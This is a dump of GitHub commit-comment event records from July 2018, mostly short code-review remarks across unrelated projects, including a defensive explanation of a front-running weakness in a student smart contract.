{"id":"7934505191","type":"CommitCommentEvent","actor":{"login":"NoahKange"},"repo":{"name":"omachol/GROUP-15"},"payload":{"comment":{"id":29634867,"position":null,"line":null,"path":null,"commit_id":"5507e074a85e41ad5b51ffb8500b20632348b733","created_at":"2018-07-08T20:01:56Z","updated_at":"2018-07-08T20:01:56Z","author_association":"COLLABORATOR","body":"Continue commiting all your changes and documents. All of them, code and the documentation."}},"created_at":"2018-07-08T20:01:56Z"}
{"id":"7934506417","type":"CommitCommentEvent","actor":{"login":"NoahKange"},"repo":{"name":"muwongeemmanuel/recessgroup10"},"payload":{"comment":{"id":29634868,"position":null,"line":null,"path":null,"commit_id":"f8faffa36bb8d854f550740c89453e97e478422d","created_at":"2018-07-08T20:02:50Z","updated_at":"2018-07-08T20:02:50Z","author_association":"COLLABORATOR","body":"every one has to perticipate."}},"created_at":"2018-07-08T20:02:50Z"}
{"id":"7934508170","type":"CommitCommentEvent","actor":{"login":"wilzbach"},"repo":{"name":"dlang/ci"},"payload":{"comment":{"id":29634870,"position":4,"line":331,"path":"vars/runPipeline.groovy","commit_id":"b8d82c7ba18469ddfbcec82962661599896c7d18","created_at":"2018-07-08T20:04:08Z","updated_at":"2018-07-08T20:04:08Z","author_association":"MEMBER","body":"Argh. Thanks!"}},"created_at":"2018-07-08T20:04:08Z"}
{"id":"7934517557","type":"CommitCommentEvent","actor":{"login":"daro345"},"repo":{"name":"daro345/TestGIT"},"payload":{"comment":{"id":29634876,"position":null,"line":null,"path":null,"commit_id":"0f39b9fcaaff3d831499c669959666cfab33857e","created_at":"2018-07-08T20:10:38Z","updated_at":"2018-07-08T20:10:38Z","author_association":"OWNER","body":"Going back to tipple B"}},"created_at":"2018-07-08T20:10:38Z"}
{"id":"7934518134","type":"CommitCommentEvent","actor":{"login":"nathannorthcutt"},"repo":{"name":"telefrek/ldap"},"payload":{"comment":{"id":29634877,"position":42,"line":115,"path":"LDAP/IO/LDAPConnection.cs","commit_id":"ac16a151462b1fa5f579eff6cefd232be4e919d3","created_at":"2018-07-08T20:11:03Z","updated_at":"2018-07-08T20:11:03Z","author_association":"CONTRIBUTOR","body":"This is wrong, not all requests through here are bind requests, need to fix this"}},"created_at":"2018-07-08T20:11:03Z"}
{"id":"7934519046","type":"CommitCommentEvent","actor":{"login":"nathannorthcutt"},"repo":{"name":"telefrek/ldap"},"payload":{"comment":{"id":29634878,"position":26,"line":61,"path":"LDAP/IO/MessagePump.cs","commit_id":"ac16a151462b1fa5f579eff6cefd232be4e919d3","created_at":"2018-07-08T20:11:41Z","updated_at":"2018-07-08T20:11:41Z","author_association":"CONTRIBUTOR","body":"if there is no token, do we just keep this forever?  should at least be a default timeout, don't care if it's an hour"}},"created_at":"2018-07-08T20:11:41Z"}
{"id":"7934519782","type":"CommitCommentEvent","actor":{"login":"robertdfrench"},"repo":{"name":"robertdfrench/sturdy-octo-couscous"},"payload":{"comment":{"id":29634882,"position":null,"line":null,"path":null,"commit_id":"1d44813c43540c3515e387c139380b255f528b4b","created_at":"2018-07-08T20:12:14Z","updated_at":"2018-07-08T20:12:14Z","author_association":"OWNER","body":"Yeah, it takes them to a web form, they enter in anything we prompt them for, and then it deploys live from the browser. Then they get a link to go see their app. Seems pretty smooth."}},"created_at":"2018-07-08T20:12:14Z"}
{"id":"7934520054","type":"CommitCommentEvent","actor":{"login":"nathannorthcutt"},"repo":{"name":"telefrek/ldap"},"payload":{"comment":{"id":29634883,"position":64,"line":98,"path":"LDAP/IO/MessagePump.cs","commit_id":"ac16a151462b1fa5f579eff6cefd232be4e919d3","created_at":"2018-07-08T20:12:25Z","updated_at":"2018-07-08T20:12:25Z","author_association":"CONTRIBUTOR","body":"race, if there's a timeout, but we have the result, may be cancelled with a response.  not sure if that's really and end of the world thing, but should note it"}},"created_at":"2018-07-08T20:12:25Z"}
{"id":"7934520409","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29634884,"position":null,"line":null,"path":null,"commit_id":"5d2ff4a50320f7ea2ef2590b1d96c38021832871","created_at":"2018-07-08T20:12:40Z","updated_at":"2018-07-08T20:12:40Z","author_association":"CONTRIBUTOR","body":"Don't forget to update the documentation:\r\nhttps://github.com/nert-gu/Xposition/blob/5d2ff4a50320f7ea2ef2590b1d96c38021832871/wiki/plugins/macros/mdx/macro.py#L204-L205"}},"created_at":"2018-07-08T20:12:40Z"}
{"id":"7934520948","type":"CommitCommentEvent","actor":{"login":"nathannorthcutt"},"repo":{"name":"telefrek/ldap"},"payload":{"comment":{"id":29634887,"position":33,"line":68,"path":"LDAP/IO/MessagePump.cs","commit_id":"ac16a151462b1fa5f579eff6cefd232be4e919d3","created_at":"2018-07-08T20:13:04Z","updated_at":"2018-07-08T20:13:04Z","author_association":"CONTRIBUTOR","body":"reverse the order to prevent success and cancel race?  at least makes one a winner"}},"created_at":"2018-07-08T20:13:04Z"}
{"id":"7934526224","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"alekseyspjsb/lesson5"},"payload":{"comment":{"id":29634895,"position":3,"line":3,"path":"css/style.css","commit_id":"6f8eac35576de578a6b2c2d81c4e5ca9f8ffbbd8","created_at":"2018-07-08T20:16:44Z","updated_at":"2018-07-08T20:16:44Z","author_association":"COLLABORATOR","body":"обычно делают одну строку отступа между классами:\r\n```css\r\np {\r\n  color: orange\t\r\n}\r\n\r\ntable {\r\n  background: black;\r\n  color: white;\r\n}\r\n```"}},"created_at":"2018-07-08T20:16:44Z"}
{"id":"7934527557","type":"CommitCommentEvent","actor":{"login":"martin-loetzsch"},"repo":{"name":"mara/data-integration"},"payload":{"comment":{"id":29634898,"position":null,"line":null,"path":null,"commit_id":"28807621e6b4ec75248981f45fdacc5d7259000e","created_at":"2018-07-08T20:17:41Z","updated_at":"2018-07-08T20:17:41Z","author_association":"MEMBER","body":"great, let's discuss on Tuesday"}},"created_at":"2018-07-08T20:17:41Z"}
{"id":"7934529248","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"R3x/src"},"payload":{"comment":{"id":29634899,"position":108,"line":182,"path":"sys/arch/amd64/amd64/report.c","commit_id":"c5b5cafd82cc47cc2f9ded9a07b968ea48764d7f","created_at":"2018-07-08T20:18:53Z","updated_at":"2018-07-08T20:18:53Z","author_association":"NONE","body":"Please follow the approach from kubsan to put everything into a single panic(9) call."}},"created_at":"2018-07-08T20:18:53Z"}
{"id":"7934530726","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"R3x/src"},"payload":{"comment":{"id":29634900,"position":180,"line":386,"path":"sys/arch/amd64/amd64/report.c","commit_id":"c5b5cafd82cc47cc2f9ded9a07b968ea48764d7f","created_at":"2018-07-08T20:19:58Z","updated_at":"2018-07-08T20:19:58Z","author_association":"NONE","body":"what is multshot?"}},"created_at":"2018-07-08T20:19:58Z"}
{"id":"7934536333","type":"CommitCommentEvent","actor":{"login":"uhPotato"},"repo":{"name":"uhPotato/Project1"},"payload":{"comment":{"id":29634906,"position":null,"line":null,"path":null,"commit_id":"1b409e8dff441dca5b841bece1b8d67185026555","created_at":"2018-07-08T20:23:44Z","updated_at":"2018-07-08T20:23:44Z","author_association":"OWNER","body":"I can see the commit from here..."}},"created_at":"2018-07-08T20:23:44Z"}
{"id":"7934544300","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29634921,"position":57,"line":57,"path":"contracts/Remittance.sol","commit_id":"003f778f66e45b8fcf6664299362ea35cf6967fd","created_at":"2018-07-08T20:29:27Z","updated_at":"2018-07-08T20:29:27Z","author_association":"NONE","body":"There are two trains of thought here. \r\n\r\nFirst, when you pass the secrets into a function, that data/those transactions are broadcast to the network in plain sight. Thus, the \"solution\" is known to observers before a transaction is mined. That is a non-trivial pre-mature divulgence of the secret combination that opens the box. The money will be stolen by the first hacker who figures out to just watch the contract's pending transactions and create his own transactions with knowledge of the password and a higher gas price. It become a race and a probability game ... who's transaction will be mined first?  A solution to that problem is to take extra care to ensure that funds are forwarded to any old person who comes along with the answer - rather ... the funds know where they belong and will only go there regardless of who solves the transaction. \r\n\r\nSecond. Related to the first ... in the simplistic formulation we use two passwords but this is partly to let you discover that trap. You might solve it by making the receiver (Carol) part of the struct and then `remittanceAgent.transfer(amount)` instead of `msg.sender.transfer(amount)`. That will solve the security problem. \r\n\r\nThen, you will realize that you don't need a password from the remittance agent (destination) because you can use `msg.sender` in the hash function ... so only the proper receiver can possibly unlock the box. \r\n\r\nConsider\r\n```\r\nfunction hashHelper(address remittanceAgent, bytes32 secret) public pure returns(bytes32 hashPass) {\r\n  return keccak256(abi.encodePacked(remittanceAgent,secret));\r\n}\r\n```\r\n"}},"created_at":"2018-07-08T20:29:27Z"}
{"id":"7934545812","type":"CommitCommentEvent","actor":{"login":"noobcode"},"repo":{"name":"dave94-42/MLExam"},"payload":{"comment":{"id":29634925,"position":5,"line":71,"path":"src/loss_functions.py","commit_id":"e7f4debb798103f7e53fe0b5d324de6e6b095a5d","created_at":"2018-07-08T20:30:17Z","updated_at":"2018-07-08T20:30:17Z","author_association":"COLLABORATOR","body":"l'errore di regolarizzazione si aggiunge, no?"}},"created_at":"2018-07-08T20:30:17Z"}
{"id":"7934546287","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29634927,"position":57,"line":57,"path":"contracts/Remittance.sol","commit_id":"003f778f66e45b8fcf6664299362ea35cf6967fd","created_at":"2018-07-08T20:30:32Z","updated_at":"2018-07-08T20:30:32Z","author_association":"NONE","body":"The `pure` function above use useful for JS clients that are tasked with computing the hash using the exact same hash algo the contract will later use to evaluate \"solutions\" to the puzzle. "}},"created_at":"2018-07-08T20:30:32Z"}
{"id":"7934547406","type":"CommitCommentEvent","actor":{"login":"noobcode"},"repo":{"name":"dave94-42/MLExam"},"payload":{"comment":{"id":29634928,"position":99,"line":341,"path":"src/Neural_network.py","commit_id":"e7f4debb798103f7e53fe0b5d324de6e6b095a5d","created_at":"2018-07-08T20:31:14Z","updated_at":"2018-07-08T20:31:14Z","author_association":"COLLABORATOR","body":"perché hai commentato questa riga?"}},"created_at":"2018-07-08T20:31:14Z"}
{"id":"7934548713","type":"CommitCommentEvent","actor":{"login":"gervasegallant"},"repo":{"name":"acquia/blt"},"payload":{"comment":{"id":29634931,"position":null,"line":null,"path":null,"commit_id":"6599a2ad5ef632c674f99132cf0248ae701194e1","created_at":"2018-07-08T20:32:08Z","updated_at":"2018-07-08T20:32:08Z","author_association":"NONE","body":"Was able to install xdebug with `php_xdebug_version: 2.5.0`... thanks for posting"}},"created_at":"2018-07-08T20:32:08Z"}
{"id":"7934548729","type":"CommitCommentEvent","actor":{"login":"qex"},"repo":{"name":"pereorga/minimalist-web-notepad"},"payload":{"comment":{"id":29634932,"position":null,"line":null,"path":null,"commit_id":"78841689526ce3dbfa7c266f5bb58506a30b2c7e","created_at":"2018-07-08T20:32:08Z","updated_at":"2018-07-08T20:32:08Z","author_association":"CONTRIBUTOR","body":"I think we need to improve this again, discard an empty name is unreasonable."}},"created_at":"2018-07-08T20:32:08Z"}
{"id":"7934552279","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29634937,"position":null,"line":null,"path":null,"commit_id":"d3b363c6f3f125afc2dce461a878bf4cdaa90a35","created_at":"2018-07-08T20:34:30Z","updated_at":"2018-07-08T20:34:30Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-2](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-tre.pantheonsite.io/)"}},"created_at":"2018-07-08T20:34:30Z"}
{"id":"7934554907","type":"CommitCommentEvent","actor":{"login":"kanchankamo"},"repo":{"name":"kanchankamo/Rainbow-Dance"},"payload":{"comment":{"id":29634939,"position":null,"line":null,"path":null,"commit_id":"4f85cd52a9e28c14ac1e5029d2a39bf31122b6fc","created_at":"2018-07-08T20:36:31Z","updated_at":"2018-07-08T20:36:31Z","author_association":"OWNER","body":"leave a comment"}},"created_at":"2018-07-08T20:36:31Z"}
{"id":"7934556376","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29634941,"position":null,"line":null,"path":null,"commit_id":"56edd5d922577b38c5f24f17a8a205d4dac941d5","created_at":"2018-07-08T20:37:35Z","updated_at":"2018-07-08T20:37:35Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-3](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-3-tre.pantheonsite.io/)"}},"created_at":"2018-07-08T20:37:35Z"}
{"id":"7934558603","type":"CommitCommentEvent","actor":{"login":"chriselster"},"repo":{"name":"igooralm192/ProjetoPOO"},"payload":{"comment":{"id":29634945,"position":null,"line":null,"path":null,"commit_id":"ff4ccae6aab5f915f99719245463e029ecee7c69","created_at":"2018-07-08T20:39:12Z","updated_at":"2018-07-08T20:39:12Z","author_association":"COLLABORATOR","body":"Refs #64 "}},"created_at":"2018-07-08T20:39:12Z"}
{"id":"7934559372","type":"CommitCommentEvent","actor":{"login":"alisolarflare"},"repo":{"name":"TBMCPlugins/PluginConfigs"},"payload":{"comment":{"id":29634947,"position":null,"line":null,"path":null,"commit_id":"4f07d44e86fefb5aa0051acbe9c4349959d96b14","created_at":"2018-07-08T20:39:49Z","updated_at":"2018-07-08T20:39:49Z","author_association":"MEMBER","body":"WHOPS, ACCIDENTALLY COPIED FROM MASTER, FUCKIN UP ALL MY CHANGES\r\n"}},"created_at":"2018-07-08T20:39:49Z"}
{"id":"7934560311","type":"CommitCommentEvent","actor":{"login":"mungojam"},"repo":{"name":"hvanbakel/CsprojToVs2017"},"payload":{"comment":{"id":29634950,"position":26,"line":26,"path":"Project2015To2017.Console/Options.cs","commit_id":"93427f971f5b80616e8784535340fd2fe1078c90","created_at":"2018-07-08T20:40:27Z","updated_at":"2018-07-08T20:40:27Z","author_association":"CONTRIBUTOR","body":"Along the lines I had in mind, hope you don't mind I submitted a PR to your branch showing the full extent of what I was thinking. It makes sense to have the AssemblyInfo as an option like you have done, plently of people may want to keep AssemblyInfo."}},"created_at":"2018-07-08T20:40:27Z"}
{"id":"7934563333","type":"CommitCommentEvent","actor":{"login":"LongLiveCHIEF"},"repo":{"name":"voxpupuli/puppet-gitlab"},"payload":{"comment":{"id":29634956,"position":105,"line":188,"path":"README.md","commit_id":"517469bd45e4a9ef61884550302b1080e53e2540","created_at":"2018-07-08T20:42:47Z","updated_at":"2018-07-08T20:42:47Z","author_association":"COLLABORATOR","body":"So this is correct, whenever using a custom repository, you have to set `manage_upstream_editiion` to `disabled`, and you _have_ to designate a value for `package_name`.\r\n\r\nThe order in which you call `gitlab::install` won't matter (as long as you don't try to order them yourself, since I have explicitly ordered these resources in each manifest. If you _do_ define ordering yourself, you'll wind up with dependency cycle errors."}},"created_at":"2018-07-08T20:42:47Z"}
{"id":"7934564700","type":"CommitCommentEvent","actor":{"login":"anothername99"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29634959,"position":null,"line":null,"path":null,"commit_id":"14c0140201ba9142ac96d30857bee1fcbb0d7da3","created_at":"2018-07-08T20:43:44Z","updated_at":"2018-07-08T20:43:44Z","author_association":"NONE","body":"I'll have to test when the buildbot is done."}},"created_at":"2018-07-08T20:43:44Z"}
{"id":"7934565910","type":"CommitCommentEvent","actor":{"login":"lbkchen"},"repo":{"name":"kelseyywang/git-dumb"},"payload":{"comment":{"id":29634961,"position":8,"line":9,"path":"README.md","commit_id":"2cc8ba26830b70fa0fb352f54c63e29d51bfbad7","created_at":"2018-07-08T20:44:36Z","updated_at":"2018-07-08T20:44:36Z","author_association":"NONE","body":"( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)( ͡° ͜ʖ ͡°)"}},"created_at":"2018-07-08T20:44:36Z"}
{"id":"7934566181","type":"CommitCommentEvent","actor":{"login":"LongLiveCHIEF"},"repo":{"name":"voxpupuli/puppet-gitlab"},"payload":{"comment":{"id":29634962,"position":105,"line":188,"path":"README.md","commit_id":"517469bd45e4a9ef61884550302b1080e53e2540","created_at":"2018-07-08T20:44:47Z","updated_at":"2018-07-08T20:44:47Z","author_association":"COLLABORATOR","body":"> So this is correct, whenever using a custom repository, you have to set manage_upstream_editiion to disabled, and you have to designate a value for package_name.\r\n\r\nRefer to line #168 in the README.md of this merge request:\r\n> If `manage_upstream_edition` is set to `disabled`, you will need to provide the appropriate value to `package_name`\r\n"}},"created_at":"2018-07-08T20:44:47Z"}
{"id":"7934568352","type":"CommitCommentEvent","actor":{"login":"joshlewis"},"repo":{"name":"zoom/sample-app-php"},"payload":{"comment":{"id":29634968,"position":null,"line":null,"path":null,"commit_id":"80436e40afa9baf345d54f3f84887acc97dc92f6","created_at":"2018-07-08T20:46:17Z","updated_at":"2018-07-08T20:46:17Z","author_association":"NONE","body":"Now that this deprecation is a year old, it would be great to see the new stuff!"}},"created_at":"2018-07-08T20:46:17Z"}
{"id":"7934569133","type":"CommitCommentEvent","actor":{"login":"bethesque"},"repo":{"name":"pact-foundation/pact-go"},"payload":{"comment":{"id":29634969,"position":null,"line":null,"path":null,"commit_id":"c9a889e5ea1ce660da3d3dcef915cdc5015bc318","created_at":"2018-07-08T20:46:48Z","updated_at":"2018-07-08T20:46:48Z","author_association":"CONTRIBUTOR","body":"👍 But it was a good reminder that I needed to fix the thing!"}},"created_at":"2018-07-08T20:46:48Z"}
{"id":"7934570272","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29634970,"position":null,"line":null,"path":null,"commit_id":"307a86a651051074f487818cf3d9f64c9bdbd4a8","created_at":"2018-07-08T20:47:22Z","updated_at":"2018-07-08T20:47:22Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2785 of 2971 tests passed, 74 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 211 tests had: EIO diffs.\n * 102 tests had: MTR small diffs.\n * 173 tests had: Table big diffs.\n * 164 tests had: ESO small diffs.\n * 71 tests had: ESO big diffs.\n * 35 tests had: MTR big diffs.\n * 30 tests had: Table small diffs.\n * 7 tests had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 457\n * Failed: 186\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.74%25-yellow.png)</a> \n"}},"created_at":"2018-07-08T20:47:22Z"}
{"id":"7934570324","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29634971,"position":null,"line":null,"path":null,"commit_id":"56edd5d922577b38c5f24f17a8a205d4dac941d5","created_at":"2018-07-08T20:47:24Z","updated_at":"2018-07-08T20:47:24Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-5](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-5-tre.pantheonsite.io/)"}},"created_at":"2018-07-08T20:47:24Z"}
{"id":"7934571914","type":"CommitCommentEvent","actor":{"login":"System96"},"repo":{"name":"System96/Cryptostake"},"payload":{"comment":{"id":29634978,"position":null,"line":null,"path":null,"commit_id":"0c68817227e8c644e7b432721991857955704bd9","created_at":"2018-07-08T20:48:31Z","updated_at":"2018-07-08T20:48:31Z","author_association":"OWNER","body":"yes"}},"created_at":"2018-07-08T20:48:31Z"}
{"id":"7934572457","type":"CommitCommentEvent","actor":{"login":"wxxxxxxsh"},"repo":{"name":"wxxxxxxsh/course-git-blog-project"},"payload":{"comment":{"id":29634979,"position":null,"line":null,"path":null,"commit_id":"a3dc99a197c66ccb87e3f4905502a6c6eddd15b1","created_at":"2018-07-08T20:48:54Z","updated_at":"2018-07-08T20:48:54Z","author_association":"OWNER","body":"udacity"}},"created_at":"2018-07-08T20:48:54Z"}
{"id":"7934573941","type":"CommitCommentEvent","actor":{"login":"philipphenkel"},"repo":{"name":"1010Technologies/pxt-makerbit"},"payload":{"comment":{"id":29634980,"position":null,"line":null,"path":null,"commit_id":"3b39785121baebbe89e9b0dbe631e14afbb360be","created_at":"2018-07-08T20:49:50Z","updated_at":"2018-07-08T20:49:50Z","author_association":"CONTRIBUTOR","body":"Will be re-enabled with proper implementation of MP3 folder management in #3 "}},"created_at":"2018-07-08T20:49:50Z"}
{"id":"7934577233","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29634983,"position":null,"line":null,"path":null,"commit_id":"307a86a651051074f487818cf3d9f64c9bdbd4a8","created_at":"2018-07-08T20:52:17Z","updated_at":"2018-07-08T20:52:17Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-08T20:52:17Z"}
{"id":"7934577624","type":"CommitCommentEvent","actor":{"login":"livemusicbangla"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":29634984,"position":null,"line":null,"path":null,"commit_id":"27c32a4639bb75bf073e6fa8bea2f12cc2207591","created_at":"2018-07-08T20:52:32Z","updated_at":"2018-07-08T20:52:32Z","author_association":"NONE","body":"Issue"}},"created_at":"2018-07-08T20:52:32Z"}
{"id":"7934577705","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29634985,"position":null,"line":null,"path":null,"commit_id":"e371e3bba40c6458052284624c02d1fb135b7abd","created_at":"2018-07-08T20:52:36Z","updated_at":"2018-07-08T20:52:36Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-7](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-7).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-7-tre.pantheonsite.io/)"}},"created_at":"2018-07-08T20:52:36Z"}
{"id":"7934579099","type":"CommitCommentEvent","actor":{"login":"livemusicbangla"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":29634990,"position":477,"line":477,"path":"stylesheets/stylesheet.css","commit_id":"55d011c88aa2c786bc4e9c6842470ee91a04e0e5","created_at":"2018-07-08T20:53:40Z","updated_at":"2018-07-08T20:53:40Z","author_association":"NONE","body":"Issue"}},"created_at":"2018-07-08T20:53:40Z"}
{"id":"7934579706","type":"CommitCommentEvent","actor":{"login":"BaptisteGelez"},"repo":{"name":"Plume-org/Plume"},"payload":{"comment":{"id":29634991,"position":2,"line":1,"path":"migrations/2018-04-22-093322_create_instances/up.sql","commit_id":"153400959c8900cf8e46275153c8cd98fcf75dd2","created_at":"2018-07-08T20:54:06Z","updated_at":"2018-07-08T20:54:06Z","author_association":"MEMBER","body":"WTF"}},"created_at":"2018-07-08T20:54:06Z"}
{"id":"7934582935","type":"CommitCommentEvent","actor":{"login":"AlgorithMan-de"},"repo":{"name":"AlgorithMan-de/wyoos"},"payload":{"comment":{"id":29634997,"position":null,"line":null,"path":null,"commit_id":"01557ac3b68bc7f9e39e76d4b4bf2fdbe627ce3d","created_at":"2018-07-08T20:56:32Z","updated_at":"2018-07-08T20:56:32Z","author_association":"OWNER","body":"The video has audio, but only on the left channel."}},"created_at":"2018-07-08T20:56:32Z"}
{"id":"7934585835","type":"CommitCommentEvent","actor":{"login":"kanchankamo"},"repo":{"name":"kanchankamo/Rainbow-Dance"},"payload":{"comment":{"id":29635001,"position":5,"line":1,"path":"dance-2.txt","commit_id":"4d7137d4ff9993ab76640b70c566ade2d89b9dc8","created_at":"2018-07-08T20:58:45Z","updated_at":"2018-07-08T20:58:45Z","author_association":"OWNER","body":"hjjjkjkjk"}},"created_at":"2018-07-08T20:58:45Z"}
{"id":"7934586477","type":"CommitCommentEvent","actor":{"login":"kennetanti"},"repo":{"name":"System96/Cryptostake"},"payload":{"comment":{"id":29635003,"position":null,"line":null,"path":null,"commit_id":"0c68817227e8c644e7b432721991857955704bd9","created_at":"2018-07-08T20:59:13Z","updated_at":"2018-07-08T20:59:13Z","author_association":"NONE","body":"FAKE INTERNET MONEY IS FUCKING SERIOUS BRO."}},"created_at":"2018-07-08T20:59:13Z"}
{"id":"7934587238","type":"CommitCommentEvent","actor":{"login":"Resaec"},"repo":{"name":"CTCaer/hekate"},"payload":{"comment":{"id":29635007,"position":null,"line":null,"path":null,"commit_id":"6d556bf21309839bf49ffba608a6935952c7e890","created_at":"2018-07-08T20:59:49Z","updated_at":"2018-07-08T20:59:49Z","author_association":"NONE","body":"Is it correct that memcpy length is stringSize + 1 now?\r\nWon't you accidentally copy garbage to the destination?"}},"created_at":"2018-07-08T20:59:49Z"}
{"id":"7934587326","type":"CommitCommentEvent","actor":{"login":"kanchankamo"},"repo":{"name":"kanchankamo/Rainbow-Dance"},"payload":{"comment":{"id":29635008,"position":11,"line":7,"path":"dance-2.txt","commit_id":"4d7137d4ff9993ab76640b70c566ade2d89b9dc8","created_at":"2018-07-08T20:59:54Z","updated_at":"2018-07-08T20:59:54Z","author_association":"OWNER","body":"能用华文么?"}},"created_at":"2018-07-08T20:59:54Z"}
{"id":"7934587898","type":"CommitCommentEvent","actor":{"login":"fairbird"},"repo":{"name":"oscam-emu/oscam-emu"},"payload":{"comment":{"id":29635011,"position":null,"line":null,"path":null,"commit_id":"c90f68685b521ddeb84bce35f84d255840c1e48c","created_at":"2018-07-08T21:00:13Z","updated_at":"2018-07-08T21:00:13Z","author_association":"NONE","body":"My compiler completed fine, Only that warning happens with me with compiling without crash.\r\nBefore this commit I have never got that warning.\r\n\r\nThank you"}},"created_at":"2018-07-08T21:00:13Z"}
{"id":"7934588330","type":"CommitCommentEvent","actor":{"login":"bong88macao"},"repo":{"name":"sakari/hgit"},"payload":{"comment":{"id":29635017,"position":null,"line":null,"path":null,"commit_id":"16659667133f052d3397f46fb979bc8473fb8909","created_at":"2018-07-08T21:00:25Z","updated_at":"2018-07-08T21:00:25Z","author_association":"NONE","body":"Thank\n  Phrasebook\n<https://docs.google.com/spreadsheets/d/12NzbSAuGGsOrsd1hWaYApOKSZroIzek_GDbl7-kpRGw/edit?usp=drivesdk>\n\n\nVào 9:07 CN, 08 thg 7 2018 bong88 <notifications@github.com> đã viết:\n\n> thank i'm sorry\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sakari/hgit/commit/16659667133f052d3397f46fb979bc8473fb8909#commitcomment-29631624>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Amyk5P3Q4nOxYq2jg0lihxR0tGmJtZQrks5uEWlpgaJpZM4VGjy5>\n> .\n>\n"}},"created_at":"2018-07-08T21:00:25Z"}
{"id":"7934588797","type":"CommitCommentEvent","actor":{"login":"Tahsin-Mayeesha"},"repo":{"name":"Tahsin-Mayeesha/Mediaviz"},"payload":{"comment":{"id":29635018,"position":null,"line":null,"path":null,"commit_id":"dcdb0dde84be30de1ece9b6eaf0595487f756f70","created_at":"2018-07-08T21:00:41Z","updated_at":"2018-07-08T21:00:41Z","author_association":"OWNER","body":"Rollback"}},"created_at":"2018-07-08T21:00:41Z"}
